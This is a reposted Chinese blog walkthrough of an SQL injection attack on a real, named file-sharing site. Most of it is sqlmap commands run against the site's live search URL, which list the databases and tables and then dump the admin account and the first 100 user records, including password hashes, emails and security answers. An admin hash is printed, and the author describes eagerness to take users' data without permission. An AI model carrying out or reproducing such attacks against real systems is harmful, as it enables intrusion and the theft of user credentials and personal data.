SQLMAP注入拖库过程
来源:互联网 发布:小米手机一键刷机软件 编辑:程序博客网 时间:2024/06/08 01:00
http://hi.baidu.com/shezhangwh/item/40b5cc3eb6aab4e91a969607
SQLMAP是一款开源的渗透测试程序,它可以自动探测和利用SQL注入漏洞来获得我们想要的数据。我们可以利用它执行特定的命令、查看文件、获取各种数据;当然,最猥琐的是它利用注入点拖库的速率还是灰常让人满意的。
渗透开始-->
注入点: "http://so.126disk.com/search?key=A"
测试环境: BackTrack 5 / SQLMAP 0.9
#> ./sqlmap.py -u "http://so.126disk.com/search?key=A" -v 1 --dbs
// 列举数据库 --> 126disk , information_schema
#> ./sqlmap.py -u "http://so.126disk.com/search?key=A" -v 1 --current-db
// 当前数据库 --> 126disk
#>./sqlmap.py -u "http://so.126disk.com/search?key=A" -v 1 --users
// 列数据库用户
#> ./sqlmap.py -u "http://so.126disk.com/search?key=A" -v 1 --current-user
// 当前用户
#> ./sqlmap.py -u "http://so.126disk.com/search?key=A" -v 1 --tables -D "126disk"
// 列举数据库126disk的表名
获取表名
+---------------------+
disk_admin
disk_adminlog
disk_adminmsg
disk_collection
disk_count
disk_file
disk_gonggao
disk_guolv
disk_haoyou
disk_integral
disk_integrallog
disk_jubao
disk_link
disk_links
disk_message
disk_mulu
disk_search
disk_server
disk_tag
disk_type
disk_user
disk_userlog
disk_visitors
disk_zhuanji
+----------------------+
#> ./sqlmap.py -u "http://so.126disk.com/search?key=A" -v 1 --columns -T "disk_admin" -D "126disk"
// 获取表disk_admin的列名
#>./sqlmap.py -u "http://so.126disk.com/search?key=A" -v 1 --dump -C "id,login,pass,user" -T "disk_admin" -D "126disk"
// 获取表disk_admin中的数据,包含列 id,login,pass,user --> 1|9|admin|8e8df10cbce2ef46c3d25c3a5f7fe159
#> ./sqlmap.py -u "http://so.126disk.com/search?key=A" -v 1 --columns -T "disk_user" -D "126disk"
// 获取表disk_user的列名
当看到这些列名时,心中是莫名的激动。里面可都是注册用户的数据啊
#>./sqlmap.py -u "http://so.126disk.com/search?key=A" -v 1 --dump -C "id,name,pass,email,wenti,daan" -T "disk_user" -D "126disk" --start 1 --stop 100
// 获取表disk_user的前100条数据,包含id,name,pass,email,wenti,daan;这里已经开始拖库了
SQLMAP是非常人性化的,它会将获取的数据存储在/pentest/web/scanners/sqlmap/output/so.126disk.com/dump/126disk/
补充: 在获取数据的过程中会询问是否破解HASH密码,这里选择n,我们不急于破解密文
[+]---------------------------------------------------------------------------------------------------------------[+]
参考资料:
[+]---------------------------------------------------------------------------------------------------------------[+]
注: 本文没打什么马赛克,因为本人有去查找126网盘的联系方式 想将漏洞情况同时反馈给126网盘去修补,但遗憾的是偌大的126网盘根本没有提供任何联系,我只能说抱歉了
- SQLMAP注入拖库过程
- SQLMAP注入拖库过程
- SQLMAP注入拖库过程
- sqlmap注入语句整理
- sqlmap注入语句整理
- sqlmap注入Access实例
- Sqlmap的POST注入
- Sqlmap注入技巧收集
- sqlmap---post----注入
- sqlmap注入技巧
- sqlmap实现注入操作
- sqlmap注入命令
- sqlmap的POST注入
- sqlmap post注入
- SQLMAP注入神器笔记
- SQLMAP- 自动注入
- sqlmap的注入方式
- sqlmap注入用法
- 问题....
- 网络流题集
- ScriptManager和ClientScript的区别
- Bus error 续一
- activeX控件
- SQLMAP注入拖库过程
- 黑与白
- <%#eval%>和<%#bind%>的区别
- struts2 parseRequest(request)为空替代方法
- 使用云(BAE)实现android应用数据的远程存取(MySQL)
- 通过iptables限制并发连接数20130515
- Bus error 续二
- 黑马程序员 Java基础 ---> String类
- android 如何实现apk search出现在系统的推荐列表里
